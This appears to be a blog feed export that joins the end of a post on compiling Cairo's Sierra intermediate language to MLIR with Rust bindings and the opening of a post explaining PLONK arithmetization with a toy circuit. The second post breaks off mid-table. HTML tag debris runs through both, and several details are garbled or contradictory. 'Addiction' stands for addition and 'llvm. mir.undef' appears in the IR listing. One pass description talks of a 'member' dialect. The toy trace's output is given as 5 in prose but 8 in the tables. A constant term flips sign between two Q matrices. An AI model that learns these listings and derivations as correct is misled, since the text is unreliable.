    state "Process statements" as statements</span></span>
    state "Apply MLIR passes" as passes</span></span>
    [*] --> Initialize</span></span>
    state Initialize {</span></span>
        sierra --> init</span></span>
        init --> if_skip_jit</span></span>
        if_skip_jit --> engine: if JIT</span></span>
        if_skip_jit --> dialects: if Compile</span></span>
        engine --> dialects</span></span>
    }</span></span>
    Initialize --> Compile</span></span>
    state Compile {</span></span>
        module --> libc</span></span>
        libc --> types</span></span>
        types --> libfuncs</span></span>
        types --> func_info</span></span>
        func_info --> libfuncs</span></span>
        libfuncs --> funcs</span></span>
        funcs --> blocks</span></span>
        blocks --> statements</span></span>
    }</span></span>
    Compile --> passes</span></span>
    passes --> Output</span></span>
    Output --> [*]</span></span></code></pre>
The first step is initializing our machinery.

We need to create our dialect and context and register them. A context contains IR, dialects, and passes and owns various objects, such as types, locations, and dialect instances.</p>
let registry = dialect::Registry::new();</span></span>
register_all_dialects(&registry);</span></span>
let context = Context::new();</span></span>
context.append_dialect_registry(&registry);</span></span>
context.load_all_available_dialects();</span></span>
register_all_llvm_translations(&context);</span></span></code></pre>
We also need to create a region with a block for the builtin module:</p>
let location = Location::unknown(&context);</span></span>
let region = Region::new();</span></span>
let block = Block::new(&[]);</span></span>
region.append_block(block);</span></span>
let module_op = operation::Builder::new("builtin.module", location)</span></span>
    .add_regions(vec![region])</span></span>
    .build();</span></span>
let module = Module::from_operation(module_op).unwrap();</span></span></code></pre>
Once initialization is done, we can start converting by processing, in sequence: types, libfuncs, functions, and statements. We won’t go into full detail, but we can look at an exciting example short enough to inspect its transformation process: a program performing addition and subtraction of field elements and see how libruls are processed.</p>
For every function declaration in the libfunc declaration section of our Sierra program, the libfunc name will be matched, and the execution of compilation will be dispatched to the appropriate Rust function.</p>
This simple function takes a Felt (a 252-bit Field Element) and returns a struct with two values:</p>
fn something(a: felt252) -> (felt252, felt252) {</span></span>
    (a + 2, a - 2)</span></span>
}</span></span></code></pre>
The cairo compiler outputs the following Sierra:</p>
type felt252 = felt252;</span></span>
type Tuple<felt252, felt252> = Struct<ut@Tuple, felt252, felt252>;</span></span>
</span>
libfunc felt252_const<2> = felt252_const<2>;</span></span>
libfunc dup<felt252> = dup<felt252>;</span></span>
libfunc felt252_add = felt252_add;</span></span>
libfunc felt252_sub = felt252_sub;</span></span>
libfunc struct_construct<Tuple<felt252, felt252>> = struct_construct<Tuple<felt252, felt252>>;</span></span>
libfunc store_temp<Tuple<felt252, felt252>> = store_temp<Tuple<felt252, felt252>>;</span></span>
</span>
felt252_const<2>() -> ([1]);</span></span>
dup<felt252>([0]) -> ([0], [3]);</span></span>
felt252_add([3], [1]) -> ([2]);</span></span>
felt252_const<2>() -> ([4]);</span></span>
felt252_sub([0], [4]) -> ([5]);</span></span>
struct_construct<Tuple<felt252, felt252>>([2], [5]) -> ([6]);</span></span>
store_temp<Tuple<felt252, felt252>>([6]) -> ([7]);</span></span>
return([7]);</span></span>
</span>
simple::simple::something@0([0]: felt252) -> (Tuple<felt252, felt252>);</span></span></code></pre>
Despite being quite low-level, it is still readable:</p>
    * declare a felt constant with value 2 into memory cell 1</span></span>
    * duplicate the value in memory cell 0 into cell 3</span></span>
    * add the value in the memory cell 1 to the one in cell 3 and put the result in cell 2</span></span>
    * declare a felt constant with value 2 into memory cell 4</span></span>
    * subtract the value in the memory cell 4 from the value in cell 0, and put the result in cell 5</span></span>
    * construct a tuple of type `<felt252, felt252>` with values from cells 2 and 5, and put it in cell 6</span></span>
    * store this value in cell 7 in preparation for returning it</span></span>
    * return the value in cell 7</span></span></code></pre>
The meat in this simple example is the “felt252_add</code>” libfunc which implements addition for field elements.

Let’s see how this is implemented in our MLIR dialect:</p>
We’ll need a region with several blocks, one in which the calculation occurs, another in which we’ll return values that result in numbers greater or equal than the field prime, and another for returning values lesser than the field prime.

We obtain the arguments, perform the addition, and check the result against the field prime.</p>
This condition is represented by the op_cond_br</code> conditional branch operation from the MLIR cf</code> dialect, which</p>

… contains low-level, i.e., non-region-based, control flow constructs.

These constructs generally represent control flow directly on SSA blocks of a control flow graph.

The cond_br terminator operation represents a conditional branch on a boolean (1-bit integer) value. If the bit is set, then the first destination is jumped to; if it is false, the second destination is chosen.</p>
</blockquote>
In our case, due to how addiction works in the field, if the result is greater than the field prime, we can simply subtract the prime value to wrap around. In other words, if the result is greater, jump to the gte_prime_block</code> or “greater than prime block,” and if not, jump to the in_range_block.</code></p>
pub fn create_libfunc_felt_add(</span></span>
        & 'ctx self,</span></span>
        func_decl: &LibfuncDeclaration,</span></span>
        parent_block: BlockRef<'ctx>,</span></span>
        storage: &mut Storage<'ctx>,</span></span>
    ) -> Result<()> {</span></span>
        let id = func_decl.id.debug_name.as_ref().unwrap().to_string();</span></span>
        let sierra_felt_type = SierraType::Simple(self.felt_type());</span></span>
        let felt_type = sierra_felt_type.get_type();</span></span>
        let felt_type_location = sierra_felt_type.get_type_location(&self.context);</span></span>
</span>
        let region = Region::new();</span></span>
        //Block in which the calculation occurs</span></span>
        let entry_block = Block::new(&[felt_type_location, felt_type_location]);</span></span>
        //Block for wrapping values >= PRIME</span></span>
        let gte_prime_block = Block::new(&[]);</span></span>
        //Block for returning values < PRIME</span></span>
        let in_range_block = Block::new(&[]);</span></span>
</span>
        // res = lhs + rhs</span></span>
        let lhs = entry_block.argument(0)?.into();</span></span>
        let rhs = entry_block.argument(1)?.into();</span></span>
        let res_op = self.op_add(&entry_block, lhs, rhs);</span></span>
        let res = res_op.result(0)?.into();</span></span>
</span>
        // gt_prime <=> res_result >= PRIME</span></span>
        let prime_op = self.prime_constant(&entry_block);</span></span>
        let prime = prime_op.result(0)?.into();</span></span>
        let gte_prime_op = self.op_cmp(&entry_block, CmpOp::UnsignedGreaterThanEqual, res, prime);</span></span>
        let gte_prime = gte_prime_op.result(0)?.into();</span></span>
</span>
        // if gt_prime</span></span>
        self.op_cond_br(&entry_block, gte_prime, &gte_prime_block, &in_range_block, &[], &[]);</span></span>
</span>
        // gt prime block</span></span>
        let wrapped_res_op = self.op_sub(&gte_prime_block, res, prime);</span></span>
        let wrapped_res = wrapped_res_op.result(0)?.into();</span></span>
        self.op_return(&gte_prime_block, &[wrapped_res]);</span></span>
</span>
        // in range block</span></span>
        self.op_return(&in_range_block, &[res]);</span></span>
</span>
        region.append_block(entry_block);</span></span>
        region.append_block(in_range_block);</span></span>
        region.append_block(gte_prime_block);</span></span>
        let func = self.op_func(</span></span>
            &id,</span></span>
            &create_fn_signature(&[felt_type, felt_type], &[felt_type]),</span></span>
            vec![region],</span></span>
            FnAttributes::libfunc(false, true),</span></span>
        )?;</span></span>
</span>
        parent_block.append_operation(func);</span></span>
        storage.libfuncs.insert(</span></span>
            id,</span></span>
            SierraLibFunc::create_function_all_args(</span></span>
                vec![sierra_felt_type.clone(), sierra_felt_type.clone()],</span></span>
                vec![sierra_felt_type],</span></span>
            ),</span></span>
        );</span></span>
        Ok(())</span></span>
    }</span></span></code></pre>
This is the MLIR corresponding to the felt252_add libfunc:</p>
func.func @felt252_add(%arg0: i256, %arg1: i256) -> i256 attributes {llvm.dso_local, llvm.linkage = #llvm.linkage<internal>, passthrough = ["norecurse," "alwaysinline," "nounwind"]} {</span></span>
    %0 = arith.addi %arg0, %arg1 : i256</span></span>
    %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 = arith.constant 3618502788666131213697322783095070105623107215331596699973092056135872020481 : i256</span></span>
    %1 = arith.cmpi uge, %0, %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 : i256</span></span>
    cf.cond_br %1, ^bb2, ^bb1</span></span>
  ^bb1:  // pred: ^bb0</span></span>
    return %0 : i256</span></span>
  ^bb2:  // pred: ^bb0</span></span>
    %2 = arith.subi %0, %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 : i256</span></span>
    return %2 : i256</span></span>
  }</span></span></code></pre>
As you can see, we have three basic blocks, and the last instruction of the first is a conditional jump.</p>
This is the entire resulting MLIR before going the registered passes:</p>
module {</span></span>
  func.func @felt252_add(%arg0: i256, %arg1: i256) -> i256 attributes {llvm.dso_local, llvm.linkage = #llvm.linkage<internal>, passthrough = ["norecurse," "alwaysinline," "nounwind"]} {</span></span>
    %0 = arith.addi %arg0, %arg1 : i256</span></span>
    %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 = arith.constant 3618502788666131213697322783095070105623107215331596699973092056135872020481 : i256</span></span>
    %1 = arith.cmpi uge, %0, %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 : i256</span></span>
    cf.cond_br %1, ^bb2, ^bb1</span></span>
  ^bb1:  // pred: ^bb0</span></span>
    return %0 : i256</span></span>
  ^bb2:  // pred: ^bb0</span></span>
    %2 = arith.subi %0, %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 : i256</span></span>
    return %2 : i256</span></span>
  }</span></span>
  func.func @felt252_sub(%arg0: i256, %arg1: i256) -> i256 attributes {llvm.dso_local, llvm.linkage = #llvm.linkage<internal>, passthrough = ["norecurse," "alwaysinline," "nounwind"]} {</span></span>
    %0 = arith.subi %arg0, %arg1 : i256</span></span>
    %c0_i256 = arith.constant 0 : i256</span></span>
    %1 = arith.cmpi slt, %0, %c0_i256 : i256</span></span>
    cf.cond_br %1, ^bb2, ^bb1</span></span>
  ^bb1:  // pred: ^bb0</span></span>
    return %0 : i256</span></span>
  ^bb2:  // pred: ^bb0</span></span>
    %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 = arith.constant 3618502788666131213697322783095070105623107215331596699973092056135872020481 : i256</span></span>
    %2 = arith.addi %0, %c3618502788666131213697322783095070105623107215331596699973092056135872020481_i256 : i256</span></span>
    return %2 : i256</span></span>
  }</span></span>
  func.func @"struct_construct<Tuple<felt252, felt252>>"(%arg0: i256, %arg1: i256) -> !llvm.struct<packed (i256, i256)> attributes {llvm.dso_local, llvm.linkage = #llvm.linkage<internal>, passthrough = ["norecurse," "alwaysinline," "nounwind"]} {</span></span>
    %0 = llvm. mir.undef : !llvm.struct<packed (i256, i256)></span></span>
    %1 = llvm.insertvalue %arg0, %0[0] : !llvm.struct<packed (i256, i256)></span></span>
    %2 = llvm.insertvalue %arg1, %1[1] : !llvm.struct<packed (i256, i256)></span></span>
    return %2 : !llvm.struct<packed (i256, i256)></span></span>
  }</span></span>
  func.func @"simple::simple::something"(%arg0: i256) -> !llvm.struct<packed (i256, i256)> attributes {llvm.dso_local, llvm.emit_c_interface} {</span></span>
    cf.br ^bb1(%arg0 : i256)</span></span>
  ^bb1(%0: i256):  // pred: ^bb0</span></span>
    %c2_i256 = arith.constant 2 : i256</span></span>
    %1 = call @felt252_add(%0, %c2_i256) : (i256, i256) -> i256</span></span>
    %c2_i256_0 = arith.constant 2 : i256</span></span>
    %2 = call @felt252_sub(%0, %c2_i256_0) : (i256, i256) -> i256</span></span>
    %3 = call @"struct_construct<Tuple<felt252, felt252>>"(%1, %2) : (i256, i256) -> !llvm.struct<packed (i256, i256)></span></span>
    return %3 : !llvm.struct<packed (i256, i256)></span></span>
  }</span></span>
}</span></span></code></pre>
Great, so we have converted Sierra to MLIR using several built-in dialects and our own.

To be able to run our code, we need to lower it to something that can be run.

An excellent choice, for now, is LLVM IR since we want to run our Cairo code as native CPU instructions and can use the very solid LLVM infrastructure to compile LLVM IR to a binary object.

We also want to leverage MLIR and LLVM’s pass manager infrastructure to take advantage of the optimizations it provides.</p>
We create a pass manager and add the passes we want our code to go through:</p>
let pass_manager = pass::Manager::new(&compiler.context);</span></span>
    register_all_passes();</span></span>
    pass_manager.add_pass(pass::conversion::convert_func_to_llvm());</span></span>
    pass_manager.add_pass(pass::conversion::convert_scf_to_cf());</span></span>
    pass_manager.add_pass(pass::conversion::convert_cf_to_llvm());</span></span>
    pass_manager.add_pass(pass::conversion::convert_arithmetic_to_llvm());</span></span>
    pass_manager.add_pass(pass::conversion::convert_index_to_llvm());</span></span>
    pass_manager.add_pass(pass::conversion::convert_math_to_llvm());</span></span>
    pass_manager.add_pass(pass::conversion::convert_memref_to_llvmconversion_pass());</span></span>
    pass_manager.add_pass(pass::conversion::convert_reconcile_unrealized_casts());</span></span>
    if optimized {</span></span>
        pass_manager.add_pass(pass::transform::canonicalizer());</span></span>
        pass_manager.add_pass(pass::transform::inliner());</span></span>
        pass_manager.add_pass(pass::transform::symbol_dce());</span></span>
        pass_manager.add_pass(pass::transform::cse());</span></span>
        pass_manager.add_pass(pass::transform::sccp());</span></span>
    }</span></span>
    pass_manager.enable_verifier(true);</span></span>
    pass_manager.run(&mut compiler.module)?;</span></span>
</span>
    let op = compiler.module.as_operation();</span></span>
    if op.verify() {</span></span>
        if debug_info {</span></span>
            Ok(op.debug_print())</span></span>
        } else {</span></span>
            Ok(op.to_string())</span></span>
        }</span></span>
    } else {</span></span>
        Err(color_eyre::eyre::eyre!("error verifying"))</span></span>
    }</span></span>
}</span></span></code></pre>
What do these passes do?</p>
    * convert_func_to_llvm`: converts the `func`dialect, which contains operations surrounding high-order function abstractions, such as calls, to the`llvm` dialect, which maps LLVM IR into MLIR by defining the corresponding operations and types.</span></span>
    * `convert_scf_to_cf`: converts the `scf` (Structured Control Flow, with loops and ifs) dialect to the `cf` (Control Flow) dialect, replacing structured control flow with a CFG. In LLVM, you have to analyze branches to detect loops. SCF is at a higher abstraction.</span></span>
    * `convert_cf_to_llvm`: converts the `cf` dialect to the `llvm` dialect.</span></span>
    * `convert_arithmetic_to_llvm`: converts the `arith` dialect (which holds basic integer and floating point mathematical operations) to the `llvm` dialect.</span></span>
    * `convert_math_to_llvm`: converts the `math` dialect (which holds mathematical operations on integer and floating types beyond simple arithmetics) to the `llvm` dialect.</span></span>
    * `convert_index_to_llvm`: converts the `index` dialect (which contains operations for manipulating values of the built-in index type) to the `llvm` dialect.</span></span>
    * `convert_memref_to_llvmconversion_pass`: The `member` dialect is intended to hold core member creation and manipulation ops, which are not strongly associated with any particular other dialect or domain abstraction.</span></span>
    * `convert_reconcile_unrealized_casts`: this pass simplifies and eliminates unrealized conversion cast operations, commonly introduced by partial dialect conversions, that transitively convert a value to another value of the same type.</span></span></code></pre>
The optimization passes we will apply are:</p>
    * `canonicalize`: Canonicalize operations. This pass performs various types of canonicalizations over a set of operations by iteratively applying the canonicalization patterns of all loaded dialects until either a fixpoint is reached or the maximum number of iterations/rewrites is exhausted. Canonicalization is an important part of compiler IR design: it makes it easier to implement reliable compiler transformations and to reason about what is better or worse in the code, and it forces interesting discussions about the goals of a particular level of IR. Most compilers have canonicalization passes, and sometimes they have many different ones (e.g., inst-combine, dag combine, etc, in LLVM). Because MLIR is a multi-level IR, it can provide a single canonicalization infrastructure and reuse it across many different IRs that it represents.</span></span>
    * `more inline`: the more inline pass inline function calls.</span></span>
    * `symbol_dce`: this pass deletes all symbols that are found to be unreachable.</span></span>
    * `cse`: this pass implements a generalized algorithm for common sub-expression elimination.</span></span>
    * `sccp`: this pass implements a general algorithm for sparse conditional constant propagation. This algorithm detects values that are known to be constant and optimistically propagates this throughout the IR. Any values proven to be constant are replaced and removed if possible.</span></span></code></pre>Execution</h4>
We now have an in-memory representation of our program in optimized MLIR. How can we execute our code?</p>
MLIR provides an ExecutionEngine, which takes a module and expects it to be translatable to LLVM IR, and then uses the LLVM JIT ExecutionEngine to compile and run it.

The engine must also know the entry point for execution, and the following example is from a benchmark of the Fibonacci function:</p>
let program = ProgramParser::new().parse(include_str!("programs/fib.sierra")).unwrap();</span></span>
</span>
let engine = ExecutionEngine::new(</span></span>
    &compiler.module,</span></span>
    2,</span></span>
    &[</span></span>
        &format!(</span></span>
            "{}/libmlir_c_runner_utils.{}",</span></span>
            run_llvm_config(&["--libdir"]).trim(),</span></span>
            env!("SHARED_LIB_EXT"),</span></span>
        ),</span></span>
        env!("S2M_UTILS_PATH"),</span></span>
    ],</span></span>
    false,</span></span>
);</span></span>
</span>
unsafe {</span></span>
    engine.invoke_packed("fib::fib::main", &mut []).unwrap();</span></span>
};</span></span></code></pre>Conclusions</h2>
As said, MLIR is a young project.

Although there is a healthy number of case studies and users</a> enough to look at the sunset sky and muse, “This is the way,” there are a few caveats.</p>
First, although it is clear that the project has made an effort, documentation is scarce.

The API is documented, and there are great getting started tutorials, but if you stray off the signaled path, you end up looking at test code, other projects, and trial and error.</p>
Second, the project is written in C++.

It provides a C-compatible API with which to fashion bindings in your language, but it is under development and unstable.

The Python bindings are also under development and not enabled by default.

The Rust bindings are somewhat auto-generated and not very mature.

You may end up having to build some tools to build this tool to build the tool you want to ship, also known as yak shaving of an especially hairy breed.</p>
Third, like any powerful tool that allows one to operate on a high level of abstraction, it requires you to be able to bridge abstraction layers and truly understand your goals and the obstacles you face in reaching them.

Knowledge of compiler technology and the techniques and vocabulary involved is a must.

Perhaps with more maturity, other tools will be able to be fashioned, which can hide complexity for more specific domains.</p>
We would like to salute and thank the team and community behind LLVM and MLIR, and Cairo.

Foundational technologies are rare, difficult to develop, and require great insight and vision to come to terms with.

These stones feel like the base on which great things will rest.</p>
</p>
References and Resources</h2>
    * [MLIR Homepage](https://mlir.llvm.org/)</span></span>
    * 2019 EuroLLVM Developers’ Meeting: T. Shpeisman & C. Lattner “MLIR: Multi-Level Intermediate Representation Compiler Infrastructure” [Video](https://www.youtube.com/watch?v=qzljG6DKgic) and [Slides](https://llvm.org/devmtg/2019-04/slides/Keynote-ShpeismanLattner-MLIR.pdf)</span></span>
    * MLIR Tutorial [Video](https://www.youtube.com/watch?v=Y4SvqTtOIDk) and [Slides](https://llvm.org/devmtg/2020-09/slides/MLIR_Tutorial.pdf)</span></span>
    * [Yizhou Shan's notes on MLIR](http://lastweek.io/notes/MLIR/)</span></span>
    * [Lei Zhang's "Compilers and IRs: LLVM IR, SPIR-V, and MLIR"](https://www.lei.chat/posts/compilers-and-irs-llvm-ir-spirv-and-mlir/)</span></span>
    * [Starkware glossary: STARKs, StarkEx, and StarkNet](https://medium.com/starkware/starks-starkex-and-starknet-9a426680745a)</span></span>
    * [Starkware: Cairo 1.0](https://medium.com/starkware/cairo-1-0-aa96eefb19a0)</span></span>
    * [Starkware: Cairo 1.0 is here](https://medium.com/starkware/cairo-1-0-is-here-7e1ac8377038)</span></span></code></pre>


All you wanted to know about Plonk
Unknown — Mon, 01 May 2023 00:00:00 +0000
Introduction</h2>
Zero-knowledge proofs, also known as ZKPs, are becoming popular due to their numerous applications in delegating computations to untrusted servers and addressing scalability issues in decentralized ledgers. By using ZKPs, we can prove the validity of a given computation without revealing sensitive information, and the proof is short and quickly verifiable. STARKs (scalable transparent arguments of knowledge) and SNARKs (succinct non-interactive arguments of knowledge) are cryptographic primitives that allow us to transform computer programs into relations between polynomials and prove their correct execution, and have numerous applications in decentralized finances, governance, and computation. For more background on these topics, you can look at our previous posts on STARKs</a> and SNARKs</a>.</p>
Due to its efficiency and flexibility, PLONK is a popular cryptographic proving system within the Zero Knowledge (ZK) community, having customized versions such as Halo2 and Kimchi. It enables the verification of complex computations executed by untrusted parties through the transformation of programs into circuit representations. The system relies on arithmetization, which converts logical circuits into polynomial expressions. The main idea behind arithmetization is to express the computation as a set of polynomial equations. The solutions to these equations correspond to the outputs of the circuit. In this section, we will delve into how arithmetization works in PLONK and the protocol used to generate and verify proofs.</p>
The original paper can be found here</a></p>
Notation</h2>
We will use the following notation throughout the article. If you are unfamiliar with some of these concepts, you can look at our math survival kit</a>.</p>
The symbol $\mathbb{F}$ denotes a finite field. It is fixed all along. The symbol $\omega$ represents a primitive root of unity in $\mathbb{F}$, that is, $\omega^n = 1$ and $\omega^k \neq 1$ for $0 < k < n$.</p>
All polynomials have coefficients in $\mathbb{F}$, and the variable is usually denoted by $X$; we denote this set as $\mathbb{F} [X]$. We represent polynomials by single letters like $p, a, b, z$. We only mark them as $z(X)$ when we want to emphasize that it is a polynomial in $X$ or we need to define a polynomial from another one explicitly. For example, when composing a polynomial $z$ with the polynomial $\omega X$, the result is denoted by $z’ := z(\omega X)$. The symbol $’$ is not</strong> used to indicate derivatives.</p>
When interpolating at a domain $H = \{h_0 , \dots , h_n \} \subset \mathbb{F}$, the symbols $L_i$ denote the Lagrange basis. That is $L_i$ is the polynomial such that $L_i (h_j) = 0$ for all $j\neq i$, and that $L_i (h_i) = 1$.</p>
If $M$ is a matrix, then $M_{i,j}$ denotes the value at the row $i$ and column $j$.</p>
The ideas and components</h1>
Programs. Our toy example</h2>
We’ll use the following toy program throughout this post for better clarity.</p>
INPUT:</span></span>
  x</span></span>
</span>
PRIVATE INPUT:</span></span>
  e</span></span>
</span>
OUTPUT:</span></span>
  e * x + x - 1</span></span></code></pre>
The observer would have noticed that we could write this program as $(e + 1) \times x - 1$, which is more sensible. But the way it is written now serves us to explain the arithmetization of PLONK better. So we’ll stick to it.</p>
The idea is that the verifier holds some value $x$, say $x=3$. He gives it to the prover. She executes the program using her chosen value $e$ and sends the output value, say $8$, along with a proof $\pi$ demonstrating the correct execution of the program and obtaining the correct output.</p>
In the context of PLONK, both the inputs and outputs of the program are considered public inputs</em>. This may sound odd, but it is because these are the inputs to the verification algorithm. This is the algorithm that takes, in this case, the tuple $(3, 8, \pi)$ and outputs Accept</em> if the toy program was executed with input $x=3$, some private value $e$ not revealed to the verifier, and out came $8$. Otherwise, it outputs Reject</em>.</p>
PLONK can be used to delegate program executions to untrusted parties, but it can also be used as proof of knowledge. A prover could use our program to demonstrate that she knows the multiplicative inverse of some value $x$ in the finite field without revealing it. She would do it by sending the verifier the tuple $(x, 0, \pi)$, where $\pi$ is the proof of the execution of our toy program.</p>
This is pointless in our toy example because any verifier efficiently performs the inversion of field elements. But change our program to the following, and you get proof of knowledge of the preimage of SHA256 digests.</p>
PRIVATE INPUT:</span></span>
  e</span></span>
</span>
OUTPUT:</span></span>
  SHA256(e)</span></span></code></pre>
Here there’s no input aside from the prover’s private input. As we mentioned, the output $h$ of the program is then part of the inputs to the verification algorithm, which, in this case, takes $(h, \pi)$.</p>
PLONK Arithmetization</h2>
This process takes the circuit of a particular program and produces a set of mathematical tools that we can use to generate and verify proofs of execution. The final result will be a set of eight polynomials. To compute them, we first need to define two matrices. We call them the $Q$ matrix and the $V$ matrix. The polynomials and the matrices depend only on the program and not on any particular execution. So they can be computed once and used for every execution instance. To understand what they are helpful for, we need to start with execution traces</em>.</p>
Circuits and execution traces</h3>
See the program as a sequence of gates with a left operand, a right operand, and an output. The two most basic gates are multiplication and addition gates. In our example, one way to see our toy program is as a composition of three gates.</p>
Gate 1: left: $e$, right: $x$, output: $u = e \times x$

Gate 2: left: $u$, right: $x$, output: $v = u + x$

Gate 3: left: $v$, right: $1$, output: $w = v - 1$</p>
On executing the circuit, all these variables will take a concrete value. We can put all that information in table form. It will be a matrix with all left, right, and output values of all the gates—one row per gate. We call the columns of this matrix $L, R, O$. Let’s build them for $x=3$ and $e=2$. We get $u=6$, $v=9$ and $w=5$. So the first matrix is:</p>
A</th> B</th> C</th></tr></thead>

2</td> 3</td> 6</td></tr>
6</td> 3</td> 9</td></tr>
9</td> -</td> 8</td></tr>
</tbody></table>
The last gate subtracts a constant value that is part of the program and is not a variable. So it has only one input instead of two. And the output is the result of subtracting $1$ from it. That’s why it is handled a bit differently from the second gate. The symbol “-” in the $R$ column is a consequence of that. With that, we mean “any value” because it won’t change the result. In the next section, we’ll see how we implement that. Here we’ll use this notation when any value can be put there. If we have to choose some, we’ll default to $0$.</p>
What we got is a valid execution trace. Not all matrices of that shape will be the trace of the execution of the program. The matrices $Q$ and $V$ will be the tools to distinguish between valid and invalid execution traces.</p>
The $Q$ matrix</h3>
As we said, it only depends on the program itself and not on any particular evaluation. It has one row for each gate, and its columns are called $Q_L, Q_R, Q_O, Q_M, Q_C$. They encode the rows’ gate type and are designed to satisfy the following.</p>
Claim:</strong> If columns $L, R, O$ correspond to a valid evaluation of the circuit, then for all $i$, the following equality holds $$A_i Q_{Li} + B_i Q_{Ri} + A_i B_i Q_{Mi} + C_i Q_{Oi} + Q_{Ci} = 0$$</p>
This is better seen with examples. The row represents a multiplication gate:</p>
$Q_L$</th> $Q_R$</th> $Q_M$</th> $Q_O$</th> $Q_C$</th></tr></thead>

0</td> 0</td> 1</td> -1</td> 0</td></tr>
</tbody></table>
And the row in the trace matrix that corresponds to the execution of that gate is</p>
A</th> B</th> C</th></tr></thead>

2</td> 3</td> 6</td></tr>
</tbody></table>
The equation in the claim for that row is that $2 \times 0 + 3 \times 0 + 2 \times 3 \times 1 + 6 \times (-1) + 0$, which equals $0$. The next is an addition gate. The row represents this:</p>
$Q_L$</th> $Q_R$</th> $Q_M$</th> $Q_O$</th> $Q_C$</th></tr></thead>

1</td> 1</td> 0</td> -1</td> 0</td></tr>
</tbody></table>
The corresponding row in the trace matrix its</p>
A</th> B</th> C</th></tr></thead>

6</td> 3</td> 9</td></tr>
</tbody></table>
And the equation of the claim is $6 \times 1 + 3 \times 1 + 2 \times 3 \times 0 + 9 \times (-1) + 0$, which adds up to $0$. Our last row is the gate that adds a constant. The row can represent addition by constant C</p>
$Q_L$</th> $Q_R$</th> $Q_M$</th> $Q_O$</th> $Q_C$</th></tr></thead>

1</td> 0</td> 0</td> -1</td> C</td></tr>
</tbody></table>
In our case, $C=-1$. The corresponding row in the execution trace is</p>
A</th> B</th> C</th></tr></thead>

9</td> -</td> 8</td></tr>
</tbody></table>
And the equation of the claim is $9 \times 1 + 0 \times 0 + 9 \times 0 \times 0 + 8 \times (-1) + C$. This is also zero.</p>
Putting it all together, the entire $Q$ matrix is</p>
$Q_L$</th> $Q_R$</th> $Q_M$</th> $Q_O$</th> $Q_C$</th></tr></thead>

0</td> 0</td> 1</td> -1</td> 0</td></tr>
1</td> 1</td> 0</td> -1</td> 0</td></tr>
1</td> 0</td> 0</td> -1</td> -1</td></tr>
</tbody></table>
And we saw that the claim is true for our particular execution:

$$ 2 \times 0 + 3 \times 0 + 2 \times 3 \times 1 + 6 \times (-1) + 0 = 0 $$

$$ 6 \times 1 + 3 \times 1 + 6 \times 3 \times 0 + 9 \times (-1) + 0 = 0 $$

$$ 9 \times 1 + 0 \times 0 + 9 \times 0 \times 0 + 8 \times (-1) + (-1) = 0 $$</p>
Not crucial to our example, but multiplication by constant C can be represented by:</p>
$Q_L$</th> $Q_R$</th> $Q_M$</th> $Q_O$</th> $Q_C$</th></tr></thead>

C</td> 0</td> 0</td> -1</td> 0</td></tr>
</tbody></table>
As you might have already noticed, there are several ways to represent the same gate in some cases. We’ll exploit this in a moment.</p>
The $V$ matrix</h3>
The claim in the previous section is not an “if and only if” statement because the following trace columns do satisfy the equations but do not correspond to a valid execution:</p>
A</th> B</th> C</th></tr></thead>

2</td> 3</td> 6</td></tr>
0</td> 0</td> 0</td></tr>
20</td> -</td> 19</td></tr>
</tbody></table>
The $V$ matrix encodes the carry of the results from one gate to the right or left operand of a subsequent one. These are called wirings</em>. Like the $Q$ matrix, it’s independent of the individual evaluation. It consists of indices for all input and intermediate variables. In this case, that matrix is:</p>
L</th> R</th> O</th></tr></thead>

0</td> 1</td> 2</td></tr>
2</td> 1</td> 3</td></tr>
3</td> -</td> 4</td></tr>
</tbody></table>
Here $0$ is the index of $e$, $1$ is the index of $x$, $2$ is the index of $u$, $3$ is the index of $v$, and $4$ is the index of the output $w$. Now we can update the claim to have an “if and only if” statement.</p>
Claim:</strong> Let $T$ be a matrix with columns $A, B, C$. It corresponds to a proper evaluation of the circuit if and only if</p>
    1. for all $i$ the following equality holds $$A_i Q_{Li} + B_i Q_{Ri} + A_i B_i Q_{Mi} + C_i Q_{Oi} + Q_{Ci} = 0,$$</span></span>
    2. for all $i,j,k,l$ such that $V_{i,j} = V_{k, l}$ we have $T_{i,j} = T_{k, l}$.</span></span></code></pre>
So now, our malformed example does not pass the second check.</p>
Custom gates</h3>
Our matrices are fine now, but they can be optimized. Let’s do that to showcase this flexibility of PLONK and also reduce the size of our example.</p>
PLONK can construct more sophisticated gates as combinations of the five columns. Therefore, the same program can be expressed in multiple ways. In our case, we can merge all three gates into a single custom gate. The $Q$ matrix ends up being a single row.</p>
$Q_L$</th> $Q_R$</th> $Q_M$</th> $Q_O$</th> $Q_C$</th></tr></thead>

0</td> 1</td> 1</td> -1</td> -1</td></tr>
</tbody></table>
and also the $V$ matrix</p>
L</th> R</th> O</th></tr></thead>

0</td> 1</td> 2</td></tr>
</tbody></table>
The trace matrix for this representation is just</p>
A</th> B</th> C</th></tr></thead>

2</td> 3</td> 8</td></tr>
</tbody></table>
And we check that it satisfies the equation</p>
$$ 2 \times 0 + 3 \times 1 + 2 \times 3 \times 1 + 8 \times (-1) + (-1) = 0$$</p>
Of course, we cannot always squash an entire program into a single gate.</p>
Public inputs</h3>
Aside from the gates that execute the program operations, additional rows must be incorporated into these matrices. This is because the prover must demonstrate not only that she ran the program but also that she used the appropriate inputs. Furthermore, the proof must include an assertion of the output value. As a result, a few extra rows are necessary. In our case, these are the first two and the last one. The original one sits now in the third row.</p>
$Q_L$</th> $Q_R$</th> $Q_M$</th> $Q_O$</th> $Q_C$</th></tr></thead>

-1</td> 0</td> 0</td> 0</td> 3</td></tr>
-1</td> 0</td> 0</td> 0</td> 8</td></tr>
1</td> 1</td> 1</td> -1</td> 1</td></tr>
1</td> -1</td> 0</td> 0</td> 0</td></tr>
</tbody></table>
And this is the updated $V$ matrix</p>
L</th> R</th> O</th></tr></thead>

0</td> -</td> -</td></tr>
1</td> -</td> -</td></tr>
2</td> 0</td> 3</td></tr>
1</td> 3</td> -</td></tr>
</tbody></table>
The first row forces the variable with index $0$ to take the value $3$. Similarly, the second row forces the variable with an index of $1$ to take the value $8$. These two will be the public inputs of the verifier. The last row checks that the program’s output is the claimed one.</p>
And the trace matrix is now</p>
A</th> B</th> C</th></tr></thead>

3</td> -</td> -</td></tr>
